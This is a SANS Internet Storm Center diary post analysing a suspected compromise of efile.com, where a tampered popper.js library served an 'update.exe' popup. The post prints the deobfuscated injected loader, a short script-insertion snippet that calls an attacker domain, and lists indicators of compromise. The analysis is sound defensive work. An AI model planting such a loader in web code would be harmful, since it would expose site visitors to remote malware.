Last week, related to the 3CX compromise, I mentioned how difficult it can be to determine if an overall trusted resource is compromised. This weekend, our reader Drew sent us a note that there is some talk about efile.com being possibly compromised. Users are reporting a popup that offers a file “update.exe.” This in itself is, of course, highly suspicious. But I was not able to reproduce the issue. Drew also linked to an any.run analysis showing the behavior [1].
The update.exe was apparently uploaded to Virustotal [2]. As I checked earlier today, only two engines flagged the file: Crowdstrike and Cynet. I just redid the analysis and did not get any additional positives. The file appears to have been uploaded on March 17th, and the creation time is March 17th as well. A post on Reddit also observed the behavior on March 17th [3]
Let’s take a closer look at efile.com. The site uses common modern technologies: Bootstrap, jQuery, and Google Analytics [4]. Nothing too special about this. But things get a bit more interesting looking at the sources downloaded by the browser:
An empty response is received from https[:]//www[.]infoamanewonliag[.]online/update/index.php. The URL’s ” update ” part matches the suspect binary’s name that users reported (update.exe).
So why did the browser connect to infoamanewonliag[.]online?
It turns out that the request came from “popper.js”:
The slightly obfuscated code becomes (line breaks added for readability):
s=document.createElement('script');
document.body.appendChild(s);
s.src='//www.infoamanewonliag.online/update/index.php?'+Math.random();
The use of obfuscated code is indeed very odd. The remaining content of popper.js matches a standard bootstrap addon to display popup dialogs [5]. Someone took the normal and harmless popper.js and added obfuscated JavaScript to connect to infoamanewonliag[.]online.
What do we know about infoamanewonliag[.]online?
Whois shows that it was registered on March 12th and last updated on March 17th, the same day update.exe was created and uploaded to Virustotal. The hostname resolves to 47.245.6.91. This IP address is hosted by Alibaba.
Compromised or not? I reached out to efile.com and am waiting for a response. Only they should be able to know for sure if this code is supposed to be on the site or not. Any other ideas to figure out what exactly is happening here?
[1] https://app.any.run/tasks/d25c5a78-d22f-4a8c-b714-73541a66a412/
[2] https://www.virustotal.com/gui/file/882d95bdbca75ab9d13486e477ab76b3978e14d6fca30c11ec368f7e5fa1d0cb/detection
[3] https://www.reddit.com/r/Scams/comments/11tx8pj/possible_fake_website_network_error/
[4] https://urlscan.io/result/ae5e4300-a850-44c9-897b-c6abed59bd08/
[5] https://unpkg.com/[email protected]/dist/umd/popper.min.js
—
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
